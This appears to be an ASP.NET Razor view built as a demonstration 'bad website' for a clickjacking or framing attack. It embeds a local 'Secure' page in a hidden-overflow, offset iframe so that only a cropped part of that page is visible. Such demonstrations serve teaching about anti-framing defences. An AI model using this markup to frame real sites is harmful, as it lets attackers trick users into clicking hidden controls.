
@{
    ViewBag.Title = "Index";
}

<h2>This is a bad website</h2>

<h2>This is a bad website</h2>
<style type="text/css">
    #attackingFrame {
        height: 500px;
        border: 0;
        top: 0px;
        position:relative;
    }
    #frameContainer {
        overflow: hidden;
        height: 150px;
        position: absolute;
        top: -50px;
    }
</style>
<!-- BEGIN: Sorry -->
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<!-- END: Sorry -->
<div id="frameContainer">
    <iframe src="http://localhost:33930/Home/Secure" id="attackingFrame"></iframe>
</div>
